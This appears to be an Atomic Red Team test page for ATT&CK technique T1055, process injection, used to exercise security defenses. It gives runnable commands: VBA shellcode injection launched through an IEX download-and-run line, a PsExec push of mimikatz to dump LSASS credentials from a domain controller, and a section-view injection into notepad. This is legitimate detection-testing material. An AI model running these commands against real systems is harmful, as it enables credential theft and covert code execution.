Try it using Invoke-Atomic

Process Injection

Description from ATT&CK

Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.

More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.

Atomic Tests

Atomic Test #1 - Shellcode execution via VBA

This module injects shellcode into a newly created process and executes. By default the shellcode is created, with Metasploit, for use on x86-64 Windows 10 machines.

Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office is required.

Supported Platforms: windows

auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048

Inputs:

Name Description Type Default Value
txt_path Path to file containing VBA macro to run path PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt

Attack Commands: Run with powershell!

1
2
3
4

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"

Dependencies: Run with powershell!

Description: The 64-bit version of Microsoft Office must be installed

Check Prereq Commands:

1
2
3
4
5
6
7

try {
  $wdApp = New-Object -COMObject "Word.Application"
  $path = $wdApp.Path
  Stop-Process -Name "winword"
  if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
} catch { exit 1 }

Get Prereq Commands:

1
2

Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"

Description: #{txt_path} must exist on disk at specified location

Check Prereq Commands:

1
2

if (Test-Path #{txt_path}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3

New-Item -Type Directory (split-path #{txt_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt" -OutFile "#{txt_path}" -UseBasicParsing

Atomic Test #2 - Remote Process Injection in LSASS via mimikatz

Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). Especially useful against domain controllers in Active Directory environments. It must be executed in the context of a user who is privileged on remote 

1

machine
.

The effect of 

1

/inject
is explained in <https://blog.3or.de/mimikatz-deep-dive-on-lsadumplsa-patch-and-inject.html>

Supported Platforms: windows

auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83

Inputs:

Name Description Type Default Value
machine machine to target (via psexec) string DC1
mimikatz_path Mimikatz windows executable path %tmp%\mimikatz\x64\mimikatz.exe
psexec_path Path to PsExec string C:\PSTools\PsExec.exe

Attack Commands: Run with command_prompt!

1
2

#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit"

Dependencies: Run with powershell!

Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})

Check Prereq Commands:

1
2
3

$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
4
5
6
7
8

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases -UseBasicParsing | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo #{mimikatz_path}
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath

Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})

Check Prereq Commands:

1
2

if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}

Get Prereq Commands:

1
2
3
4
5
6

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" -UseBasicParsing
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force

Atomic Test #3 - Section View Injection

This test creates a section object in the local process followed by a local section view. The shellcode is copied into the local section view and a remote section view is created in the target process, pointing to the local section view. A thread is then created in the target process, using the remote section view as start address.

Supported Platforms: windows

auto_generated_guid: c6952f41-6cf0-450a-b352-2ca8dae7c178

Inputs:

None

Attack Commands: Run with powershell!

1
2
3

$notepad = Start-Process notepad -passthru
Start-Process $PathToAtomicsFolder\T1055\bin\x64\InjectView.exe

Cleanup Commands:

1

Stop-Process $notepad.pid

source